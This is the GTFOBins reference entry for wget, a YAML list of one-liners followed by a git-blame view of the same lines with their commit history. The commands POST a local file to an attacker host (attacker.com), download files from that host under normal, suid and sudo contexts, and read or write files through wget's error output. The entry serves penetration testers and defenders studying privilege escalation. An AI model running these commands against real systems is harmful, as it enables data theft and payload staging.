GTFOBins.github.io/_gtfobins/wget.md

---
functions:
  file-upload:
    - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data.
      code: |
        URL=http://attacker.com/
        LFILE=file_to_send
        wget --post-file=$LFILE $URL
  file-read:
    - description: The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages, thus this is not suitable to read arbitrary binary data.
      code: |
        LFILE=file_to_read
        wget -i $LFILE
  file-write:
    - description: The data to be written is treated as a list of URLs, one per line, which are actually fetched by `wget`. The data is written, somewhat modified, as error messages, thus this is not suitable to write arbitrary binary data.
      code: |
        LFILE=file_to_write
        TF=$(mktemp)
        echo DATA > $TF
        wget -i $TF -o $LFILE
  file-download:
    - description: Fetch a remote file via HTTP GET request.
      code: |
        URL=http://attacker.com/file_to_get
        LFILE=file_to_save
        wget $URL -O $LFILE
  suid:
    - description: Fetch a remote file via HTTP GET request.
      code: |
        URL=http://attacker.com/file_to_get
        LFILE=file_to_save
        ./wget $URL -O $LFILE
  sudo:
    - description: Fetch a remote file via HTTP GET request.
      code: |
        URL=http://attacker.com/file_to_get
        LFILE=file_to_save
        sudo wget $URL -O $LFILE
---
First commit 2018-05-21 21:14:41 +02:00			`---`
			`functions:`
Adopt new function names 2018-10-05 19:55:38 +02:00			`file-upload:`
Get rid of base64 for curl and wget and make descriptions similar Close #24. 2018-09-25 19:51:20 +02:00			- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data.
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`code: \|`
Remove some useless instances of export 2020-06-10 23:04:59 +02:00			`URL=http://attacker.com/`
			`LFILE=file_to_send`
Get rid of base64 for curl and wget and make descriptions similar Close #24. 2018-09-25 19:51:20 +02:00			`wget --post-file=$LFILE $URL`
Add wget file-read/write 2021-05-15 19:21:30 +02:00			`file-read:`
			- description: The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages, thus this is not suitable to read arbitrary binary data.
			`code: \|`
			`LFILE=file_to_read`
			`wget -i $LFILE`
			`file-write:`
			- description: The data to be written is treated as a list of URLs, one per line, which are actually fetched by `wget`. The data is written, somewhat modified, as error messages, thus this is not suitable to write arbitrary binary data.
			`code: \|`
			`LFILE=file_to_write`
			`TF=$(mktemp)`
			`echo DATA > $TF`
			`wget -i $TF -o $LFILE`
Adopt new function names 2018-10-05 19:55:38 +02:00			`file-download:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- description: Fetch a remote file via HTTP GET request.`
			`code: \|`
Remove some useless instances of export 2020-06-10 23:04:59 +02:00			`URL=http://attacker.com/file_to_get`
			`LFILE=file_to_save`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`wget $URL -O $LFILE`
Adopt new function names 2018-10-05 19:55:38 +02:00			`suid:`
Add suid-enabled and sudo-enabled to curl, dd, and wget 2018-07-22 15:30:03 +02:00			`- description: Fetch a remote file via HTTP GET request.`
			`code: \|`
Remove some useless instances of export 2020-06-10 23:04:59 +02:00			`URL=http://attacker.com/file_to_get`
			`LFILE=file_to_save`
Add suid-enabled and sudo-enabled to curl, dd, and wget 2018-07-22 15:30:03 +02:00			`./wget $URL -O $LFILE`
Adopt new function names 2018-10-05 19:55:38 +02:00			`sudo:`
Add suid-enabled and sudo-enabled to curl, dd, and wget 2018-07-22 15:30:03 +02:00			`- description: Fetch a remote file via HTTP GET request.`
			`code: \|`
Remove some useless instances of export 2020-06-10 23:04:59 +02:00			`URL=http://attacker.com/file_to_get`
			`LFILE=file_to_save`
Remove useless instances of sudo -E 2020-06-10 22:53:45 +02:00			`sudo wget $URL -O $LFILE`
Fix trailing spaces 2018-05-25 01:10:39 +02:00			`---`